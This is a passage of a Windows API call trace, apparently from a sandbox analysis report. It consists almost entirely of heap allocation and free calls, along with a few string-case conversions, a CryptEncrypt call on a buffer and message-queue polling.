returned 0x2e54f18 [0259.695] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0259.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0259.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0259.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0259.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0259.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51c70 [0259.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51c70, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0259.695] CryptEncrypt (in: hKey=0xa87110, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f1c5a0*, pdwDataLen=0x8cef60*=0x42be, dwBufLen=0x42c0 | out: pbData=0x2f1c5a0*, pdwDataLen=0x8cef60*=0x42c0) returned 1 [0259.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0259.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0259.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0259.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0259.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0259.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0259.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551d8 [0259.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0259.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551d8 | out: hHeap=0x970000) returned 1 [0259.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0259.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0259.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0259.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0259.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0259.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0259.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0259.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0259.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0259.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0259.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0259.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0259.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0259.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0259.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0259.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0259.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0259.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0259.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0259.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0259.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0259.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0259.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0259.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0259.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0259.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0259.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0259.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0259.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0259.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0259.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0259.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0259.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0259.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0259.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0259.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0259.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0259.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0259.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0259.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0259.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0259.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520a8 [0259.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52138 [0259.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551a8 [0259.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52138 | out: hHeap=0x970000) returned 1 [0259.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0259.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520a8 | out: hHeap=0x970000) returned 1 [0259.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e520a8 [0259.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52048 [0259.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52108 [0259.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552d8 [0259.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52108 | out: hHeap=0x970000) returned 1 [0259.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0259.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52048 | out: hHeap=0x970000) returned 1 [0259.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0259.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0259.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0259.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0259.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0259.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0259.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0259.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0259.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0259.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0259.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0259.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0259.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0259.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0259.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0259.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0259.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0259.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0259.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0259.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0259.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0259.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0259.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0259.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0259.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0259.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0259.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0259.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0259.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0259.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0259.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0259.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0259.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0259.699] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0259.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0259.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0259.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0259.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0259.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0259.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0259.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0259.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0259.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0259.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0259.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0259.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0259.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0259.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0259.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0259.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0259.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0259.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3be0048 [0259.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0259.700] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55208 [0259.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55128 [0259.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55298 [0259.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0259.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55138 [0259.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0259.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0259.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0259.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0259.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0259.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0259.701] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0259.701] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55148 [0259.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0259.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0259.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0259.701] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0259.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0259.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0259.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0259.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0259.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0259.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0259.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0259.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0259.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0259.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0259.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0259.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x42c0) returned 0x2f20868 [0259.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0259.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0259.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0259.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0259.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0259.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0259.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0259.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0259.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0259.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0259.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x42c0) returned 0x2f24b30 [0259.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f20868 | out: hHeap=0x970000) returned 1 [0259.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0259.702] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0259.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0259.702] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0259.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0259.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0259.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0259.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0259.703] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0259.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0259.703] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0259.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0259.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0259.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51910 [0259.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0259.703] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0259.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0259.703] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0259.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0259.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0259.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ac0 [0259.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0259.703] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0259.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0259.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0259.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0259.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0259.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0259.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0259.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ad8 [0259.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0259.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b80 [0259.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b20 [0259.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b38 [0259.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0259.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0259.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51928 [0259.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b98 [0259.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519e8 [0259.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0259.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0259.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0259.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0259.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0259.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0259.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0259.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0259.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0259.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 